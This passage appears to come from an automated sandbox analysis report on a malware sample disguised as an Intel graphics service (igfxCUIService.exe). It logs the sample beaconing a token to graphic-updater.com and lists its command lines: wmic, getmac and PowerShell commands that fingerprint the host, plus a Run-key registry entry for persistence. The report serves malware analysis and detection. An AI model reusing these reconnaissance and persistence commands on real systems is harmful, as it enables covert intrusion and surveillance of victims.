                                        2022-01-11 16:09:08 UTC | 8 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:08 UTC | 9 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:08 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 54
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:08 UTC | 9 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49801 | Destination IP: 23.254.131.176 | Destination Port: 443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:08 UTC | 9 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:08 UTC | 9 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:09 UTC | 9 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 53
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:09 UTC | 9 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        9192.168.2.44980223.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:09 UTC9OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:09 UTC | 9 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:10 UTC | 9 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 52
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:10 UTC | 10 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        System Behavior

                                        General

                                        Start time:17:07:27
                                        Start date:11/01/2022
                                        Path:C:\Users\user\Desktop\IGFXCUISERVICE.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\IGFXCUISERVICE.exe"
                                        Imagebase:0x12a0000
                                        File size:401920 bytes
                                        MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:17:07:29
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                                        Imagebase:0x1280000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Start time:17:07:29
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:17:07:56
                                        Start date:11/01/2022
                                        Path:C:\ProgramData\SystemData\igfxCUIService.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\ProgramData\SystemData\igfxCUIService.exe"
                                        Imagebase:0x290000
                                        File size:401920 bytes
                                        MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 20%, Metadefender, Browse
                                        • Detection: 42%, ReversingLabs
                                        Reputation:low

                                        General

                                        Start time:17:07:58
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                                        Imagebase:0x1280000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Start time:17:07:58
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:17:08:25
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\getmac.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\getmac.exe
                                        Imagebase:0xd10000
                                        File size:65536 bytes
                                        MD5 hash:6AB605BD2223BFB2E55A466BE9816914
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:17:08:29
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                                        Imagebase:0xc20000
                                        File size:391680 bytes
                                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:17:08:40
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                                        Imagebase:0x1280000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Start time:17:08:41
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:08:45
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:08:46
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:08:46
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                        Wow64 process (32bit):true
                                        Commandline:wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
                                        Imagebase:0xc20000
                                        File size:391680 bytes
                                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:08:52
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:08:52
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:08:53
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                        Wow64 process (32bit):true
                                        Commandline:wmic nicconfig where 'IPEnabled = True' get ipaddress
                                        Imagebase:0xc20000
                                        File size:391680 bytes
                                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:00
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:01
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:01
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x3f0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:12
                                        Start date:11/01/2022
                                        Path:C:\ProgramData\SystemData\igfxCUIService.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\ProgramData\SystemData\igfxCUIService.exe"
                                        Imagebase:0x290000
                                        File size:401920 bytes
                                        MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:14
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:15
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:15
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x3f0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:21
                                        Start date:11/01/2022
                                        Path:C:\ProgramData\SystemData\igfxCUIService.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\ProgramData\SystemData\igfxCUIService.exe"
                                        Imagebase:0x290000
                                        File size:401920 bytes
                                        MD5 hash:D90D0F4D6DAD402B5D025987030CC87C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:25
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:25
                                        Start date:11/01/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:17:09:25
                                        Start date:11/01/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                        Imagebase:0x3f0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        Code Analysis